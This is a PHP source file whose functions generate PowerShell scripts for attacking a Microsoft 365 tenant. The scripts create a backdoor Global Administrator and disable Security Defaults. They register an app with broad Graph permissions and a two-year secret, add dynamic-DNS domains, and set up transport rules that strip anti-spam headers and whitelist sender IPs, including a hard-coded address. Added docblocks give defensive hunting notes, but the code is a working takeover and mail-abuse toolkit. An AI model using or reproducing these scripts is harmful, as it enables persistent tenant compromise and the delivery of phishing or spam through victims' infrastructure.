html/office-365/office-scripts-e2e-raw.php
2026-04-12 22:57:03 +02:00


<?php
/**
* Scripts E2E Office 365 - Générateurs
* À inclure dans le workflow pour générer les scripts PowerShell
*/
/**
 * Builds the text of a PowerShell script ("SCRIPT 0") that plants a persistent
 * administrator account in a Microsoft 365 tenant. Nothing is executed here;
 * the function only returns the script source.
 *
 * The generated script signs in to MSOnline and Exchange Online with the
 * supplied credentials, creates a user with display name "System Backup",
 * adds it to the "Company Administrator" role and prints the new password.
 * The source itself labels this account a backdoor.
 *
 * Review notes (defensive):
 * - $email and $password are embedded in clear text, so any recovered copy of
 *   the generated script exposes them; treat those credentials as compromised.
 * - Sign-in uses a plain username/password credential object.
 *   NOTE(review): enforcing MFA and blocking legacy authentication on admin
 *   accounts should make this step fail; confirm for the tenant concerned.
 * - Hunting: directory audit entries for a user creation followed by an
 *   addition to the Company Administrator (Global Administrator) role; a UPN
 *   of the form "Admin" + six hex characters; display name "System Backup";
 *   a password of the form "Backup@" + five digits.
 *
 * @param string $email    Account used to sign in; its domain part is reused for the new UPN.
 * @param string $password Password for $email, written verbatim into the script.
 * @return string PowerShell script source.
 */
function generateScript0($email, $password) {
// Domain part of the address; falls back to a placeholder when there is no '@'.
$parts = explode('@', $email);
$domain = $parts[1] ?? 'tenant.onmicrosoft.com';
// UPN of the account to create: "Admin" + first six hex characters of md5($email),
// so the name is deterministic for a given sign-in address.
$backdoor = 'Admin' . substr(md5($email), 0, 6) . '@' . $domain;
return "# SCRIPT 0: Récupération Office 365
\$username = \"$email\"
\$password = ConvertTo-SecureString \"$password\" -AsPlainText -Force
\$credential = New-Object PSCredential(\$username, \$password)
Install-Module MSOnline,ExchangeOnlineManagement -Force -ErrorAction SilentlyContinue
Connect-MsolService -Credential \$credential
Connect-ExchangeOnline -Credential \$credential -ShowBanner:\$false
# Créer backdoor
\$newPass = \"Backup@\" + (Get-Random -Min 10000 -Max 99999)
New-MsolUser -DisplayName \"System Backup\" -UserPrincipalName \"$backdoor\" -Password \$newPass -ForceChangePassword \$false
Add-MsolRoleMember -RoleObjectId (Get-MsolRole -RoleName \"Company Administrator\").ObjectId -RoleMemberEmailAddress \"$backdoor\"
Write-Host \"Backdoor créé: $backdoor / \$newPass\" -ForegroundColor Green";
}
/**
 * Builds the text of a PowerShell script ("SCRIPT 2") that creates long-lived
 * application credentials in an Entra ID (Azure AD) tenant. Nothing is
 * executed here; the function only returns the script source.
 *
 * The generated script connects to Microsoft Graph with the
 * Application.ReadWrite.All and Directory.ReadWrite.All scopes, sets the
 * Security Defaults policy to disabled, registers an application named
 * "SMTP-App-<random>", creates its service principal, attempts to assign it
 * four Microsoft Graph app roles (Domain.ReadWrite.All, Mail.Send,
 * User.ReadWrite.All, Directory.ReadWrite.All), adds a client secret that
 * expires 24 months later, and prints the client ID, tenant ID and secret.
 *
 * Review notes (defensive):
 * - Role-assignment errors are suppressed in the script, so a run leaves no
 *   console trace of which assignments succeeded; rely on the audit log.
 * - Hunting: audit entries for a Security Defaults policy change, a new
 *   application / service principal whose name starts with "SMTP-App-", app
 *   role assignments to it, and a credential added with a roughly two-year
 *   lifetime.
 * - Mitigation: restrict who may register applications and grant admin
 *   consent, alert on Security Defaults being disabled, and review
 *   application secrets regularly.
 *
 * @param string $email Not used by this function; no value is interpolated into the script.
 * @return string PowerShell script source.
 */
function generateScript2($email) {
return "# SCRIPT 2: Création Credentials Azure AD
Install-Module Microsoft.Graph -Force -Scope CurrentUser
Connect-MgGraph -Scopes \"Application.ReadWrite.All\",\"Directory.ReadWrite.All\"
# Désactiver Security Defaults
Update-MgPolicyIdentitySecurityDefaultEnforcementPolicy -BodyParameter @{isEnabled=\$false}
# Créer App
\$app = New-MgApplication -DisplayName \"SMTP-App-\$(Get-Random)\" -SignInAudience AzureADMyOrg
\$sp = New-MgServicePrincipal -AppId \$app.AppId
# Permissions
\$graph = Get-MgServicePrincipal -All | Where-Object {\$_.AppId -eq '00000003-0000-0000-c000-000000000000'}
@('Domain.ReadWrite.All','Mail.Send','User.ReadWrite.All','Directory.ReadWrite.All') | ForEach-Object {
\$role = \$graph.AppRoles | Where-Object {\$_.Value -eq \$_}
if(\$role) { New-MgServicePrincipalAppRoleAssignment -ServicePrincipalId \$sp.Id -PrincipalId \$sp.Id -ResourceId \$graph.Id -AppRoleId \$role.Id -ErrorAction SilentlyContinue }
}
# Secret 24 mois
\$secret = Add-MgApplicationPassword -ApplicationId \$app.Id -PasswordCredential @{endDateTime=(Get-Date).AddMonths(24)}
Write-Host \"Client ID: \$(\$app.AppId)\"
Write-Host \"Tenant ID: \$((Get-MgOrganization).Id)\"
Write-Host \"Secret: \$(\$secret.SecretText)\"
Write-Host \"COPIEZ CES VALEURS DANS WEVAL!\" -ForegroundColor Yellow";
}
/**
 * Builds the text of a PowerShell script ("SCRIPT 4") that adds domains to a
 * Microsoft 365 tenant using an application's client secret. Nothing is
 * executed here; the function only returns the script source.
 *
 * The generated script signs in to Microsoft Graph app-only with the supplied
 * tenant ID, client ID and secret, calls New-MgDomain for every entry of a
 * hard-coded $Domains list (two placeholder names that the embedded comment
 * says are to be replaced with FreeDNS domains), reports success or failure
 * per domain, then disconnects.
 *
 * Review notes (defensive):
 * - The client secret is embedded in clear text, so any recovered copy of the
 *   generated script exposes a working application credential; revoke it.
 * - App-only sign-in is not subject to user MFA. NOTE(review): whether
 *   Conditional Access for workload identities applies depends on the
 *   tenant's licensing and policy; confirm.
 * - Hunting: audit entries for domains added by a service principal rather
 *   than a user, and unexpected names (especially free dynamic-DNS
 *   subdomains) in the tenant's domain list.
 *
 * @param string $tenantId Tenant ID, written verbatim into the script.
 * @param string $clientId Application (client) ID, written verbatim into the script.
 * @param string $secret   Client secret, written verbatim into the script.
 * @return string PowerShell script source.
 */
function generateScript4($tenantId, $clientId, $secret) {
return "# SCRIPT 4: Ajout Domaines O365
\$ClientId = \"$clientId\"
\$TenantId = \"$tenantId\"
\$Secret = \"$secret\"
# MODIFIEZ CETTE LISTE avec vos domaines FreeDNS
\$Domains = @(\"domain1.mooo.com\", \"domain2.chickenkiller.com\")
\$Pass = ConvertTo-SecureString \$Secret -AsPlainText -Force
\$Cred = New-Object PSCredential(\$ClientId, \$Pass)
Connect-MgGraph -TenantId \$TenantId -ClientSecretCredential \$Cred -NoWelcome
foreach(\$d in \$Domains) {
try { New-MgDomain -BodyParameter @{id=\$d}; Write-Host \"OK: \$d\" -ForegroundColor Green }
catch { Write-Host \"Erreur: \$d\" -ForegroundColor Red }
}
Disconnect-MgGraph";
}
/**
 * Builds the text of a PowerShell script ("SCRIPT 6") that rewrites Exchange
 * Online mail-flow rules. Nothing is executed here; the function only returns
 * the script source.
 *
 * Although the script calls itself an anti-spam configuration, its rules
 * weaken filtering: after signing in to Exchange Online with the supplied
 * credentials it deletes existing transport rules named "RG*", creates one
 * rule per listed header that removes it (X-Forefront-Antispam-Report and six
 * X-MS-Exchange-CrossTenant-* / transport headers), then creates one
 * "RG<n>-WL" rule per IP that sets SCL to -1 for mail from that sender range,
 * which bypasses spam filtering.
 *
 * Review notes (defensive):
 * - $email and $password are embedded in clear text, so any recovered copy of
 *   the generated script exposes them; treat those credentials as compromised.
 * - Hunting: Exchange admin audit entries for Remove-TransportRule and
 *   New-TransportRule; rules whose names start with "RG"; rules that remove
 *   the headers above; rules that set SCL -1 for specific sender IP ranges,
 *   including the hard-coded default address in the function body.
 * - Mitigation: review transport rules after any admin-account compromise and
 *   alert on rule creation by accounts that do not normally manage mail flow.
 *
 * @param string $email    Exchange Online admin account, written verbatim into the script.
 * @param string $password Password for $email, written verbatim into the script.
 * @param array  $ips      Sender IP addresses or ranges to exempt from spam filtering.
 * @return string PowerShell script source.
 */
function generateScript6($email, $password, $ips = []) {
// With no IPs supplied, a single hard-coded address is used instead.
if(empty($ips)) $ips = ['47.84.117.248'];
// Render the list as "a","b",... for the PowerShell array literal; values are not escaped.
$ipList = '"' . implode('","', $ips) . '"';
return "# SCRIPT 6: Configuration Anti-Spam
\$User = \"$email\"
\$Pass = ConvertTo-SecureString \"$password\" -AsPlainText -Force
\$Cred = New-Object PSCredential(\$User, \$Pass)
\$IPs = @($ipList)
Install-Module ExchangeOnlineManagement -Force -Scope CurrentUser
Connect-ExchangeOnline -Credential \$Cred -ShowBanner:\$false
# Supprimer anciennes règles
Get-TransportRule | Where-Object {\$_.Name -like 'RG*'} | Remove-TransportRule -Confirm:\$false -EA SilentlyContinue
# Headers à supprimer
\$headers = @('X-Forefront-Antispam-Report','X-MS-Exchange-CrossTenant-AuthAs','X-MS-Exchange-CrossTenant-AuthSource','X-MS-Exchange-CrossTenant-Network-Message-Id','X-MS-Exchange-CrossTenant-originalarrivaltime','X-MS-Exchange-CrossTenant-id','X-MS-Exchange-Transport-CrossTenantHeadersStamped')
\$i=1; foreach(\$h in \$headers) { New-TransportRule -Name \"RG\$i\" -RemoveHeader \$h -Priority \$i -Enabled \$true; \$i++ }
# Whitelist IPs
foreach(\$ip in \$IPs) { New-TransportRule -Name \"RG\$i-WL\" -SenderIpRanges \$ip -SetSCL -1 -Priority \$i -Enabled \$true; \$i++ }
Write-Host \"Anti-spam configuré!\" -ForegroundColor Green
Disconnect-ExchangeOnline -Confirm:\$false";
}